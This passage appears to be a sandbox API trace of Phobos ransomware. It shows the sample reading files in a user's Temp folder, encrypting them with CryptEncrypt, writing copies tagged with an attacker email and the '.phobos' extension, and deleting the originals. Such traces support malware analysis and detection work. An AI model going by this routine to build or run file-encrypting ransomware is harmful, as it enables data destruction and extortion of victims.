ivlo.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.855] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10692) returned 1 [0190.856] CloseHandle (hObject=0xac) returned 1 [0190.856] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-YnXFZfYJK3 IVlO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\-ynxfzfyjk3 ivlo.wav")) returned 0x2020 [0190.856] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-YnXFZfYJK3 IVlO.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\-ynxfzfyjk3 ivlo.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-YnXFZfYJK3 IVlO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\-ynxfzfyjk3 ivlo.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0190.856] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.856] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-YnXFZfYJK3 IVlO.wav.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\-ynxfzfyjk3 ivlo.wav.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0190.856] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32be8) returned 1 [0190.856] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.856] ReadFile (in: hFile=0xac, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x29c4, lpOverlapped=0x0) returned 1 [0190.873] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x29d0, dwBufLen=0x29d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x29d0) returned 1 [0190.873] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x29d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x29d0, lpOverlapped=0x0) returned 1 [0190.874] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0190.874] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.875] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0190.875] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.875] WriteFile (in: hFile=0xb8, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0190.875] CryptDestroyKey (hKey=0xa32be8) returned 1 [0190.875] CloseHandle (hObject=0xac) returned 1 [0190.875] CloseHandle (hObject=0xb8) returned 1 [0190.875] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-YnXFZfYJK3 IVlO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\-ynxfzfyjk3 ivlo.wav")) returned 1 [0190.876] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.876] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0Qen25WMg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0qen25wmg.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.887] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=63192) returned 1 [0190.887] CloseHandle (hObject=0x178) returned 1 [0190.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0Qen25WMg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0qen25wmg.m4a")) returned 0x2020 [0190.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0Qen25WMg.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0qen25wmg.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0Qen25WMg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0qen25wmg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.888] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.888] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0Qen25WMg.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0qen25wmg.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.888] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.888] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.888] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xf6d8, lpOverlapped=0x0) returned 1 [0190.890] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf6e0, dwBufLen=0xf6e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf6e0) returned 1 [0190.891] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf6e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf6e0, lpOverlapped=0x0) returned 1 [0190.892] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0190.892] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.892] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.892] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.892] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.892] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.892] CloseHandle (hObject=0x178) returned 1 [0190.892] CloseHandle (hObject=0x194) returned 1 [0190.893] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0Qen25WMg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0qen25wmg.m4a")) returned 1 [0190.894] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0XrZNMvrHXy.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0xrznmvrhxy.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.894] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=73629) returned 1 [0190.894] CloseHandle (hObject=0x194) returned 1 [0190.894] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0XrZNMvrHXy.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0xrznmvrhxy.csv")) returned 0x2020 [0190.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0XrZNMvrHXy.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0xrznmvrhxy.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0XrZNMvrHXy.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0xrznmvrhxy.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.895] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.895] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0XrZNMvrHXy.csv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0xrznmvrhxy.csv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.895] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.895] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.895] ReadFile (in: hFile=0x194, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x11f9d, lpOverlapped=0x0) returned 1 [0190.897] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x11fa0, dwBufLen=0x11fa0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x11fa0) returned 1 [0190.897] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x11fa0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x11fa0, lpOverlapped=0x0) returned 1 [0190.899] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0190.899] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.899] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.899] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.899] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.899] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.899] CloseHandle (hObject=0x194) returned 1 [0190.899] CloseHandle (hObject=0x178) returned 1 [0190.899] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\0XrZNMvrHXy.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\0xrznmvrhxy.csv")) returned 1 [0190.900] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\1 hu.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\1 hu.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.902] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=86315) returned 1 [0190.902] CloseHandle (hObject=0x178) returned 1 [0190.902] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\1 hu.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\1 hu.gif")) returned 0x2020 [0190.902] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\1 hu.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\1 hu.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\1 hu.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\1 hu.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.902] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.902] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\1 hu.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\1 hu.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.903] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.903] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.903] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1512b, lpOverlapped=0x0) returned 1 [0190.904] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x15130, dwBufLen=0x15130 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x15130) returned 1 [0190.906] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x15130, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x15130, lpOverlapped=0x0) returned 1 [0190.908] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0190.908] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.908] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0190.908] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.908] WriteFile (in: hFile=0x194, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0190.908] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.908] CloseHandle (hObject=0x178) returned 1 [0190.908] CloseHandle (hObject=0x194) returned 1 [0190.908] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\1 hu.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\1 hu.gif")) returned 1 [0190.910] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\3xr-eVQKOGYZ34E.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\3xr-evqkogyz34e.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.979] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=75872) returned 1 [0190.979] CloseHandle (hObject=0x178) returned 1 [0190.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\3xr-eVQKOGYZ34E.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\3xr-evqkogyz34e.mp3")) returned 0x2020 [0190.979] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\3xr-eVQKOGYZ34E.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\3xr-evqkogyz34e.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\3xr-eVQKOGYZ34E.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\3xr-evqkogyz34e.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.980] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.980] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0190.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\3xr-eVQKOGYZ34E.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\3xr-evqkogyz34e.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.980] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0190.981] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.981] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x12860, lpOverlapped=0x0) returned 1 [0190.982] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12870, dwBufLen=0x12870 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x12870) returned 1 [0190.983] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x12870, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x12870, lpOverlapped=0x0) returned 1 [0190.986] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0190.986] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0190.986] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0190.986] CryptDestroyKey (hKey=0xa32d28) returned 1 [0190.986] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0190.986] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.986] CloseHandle (hObject=0x178) returned 1 [0190.986] CloseHandle (hObject=0x14c) returned 1 [0190.986] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\3xr-eVQKOGYZ34E.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\3xr-evqkogyz34e.mp3")) returned 1 [0190.987] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0190.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5oMuETnHP-S7WlfpOlSu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5omuetnhp-s7wlfpolsu.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0190.989] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=50724) returned 1 [0190.989] CloseHandle (hObject=0x14c) returned 1 [0190.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5oMuETnHP-S7WlfpOlSu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5omuetnhp-s7wlfpolsu.png")) returned 0x2020 [0190.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5oMuETnHP-S7WlfpOlSu.png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5omuetnhp-s7wlfpolsu.png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\5oMuETnHP-S7WlfpOlSu.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\5omuetnhp-s7wlfpolsu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 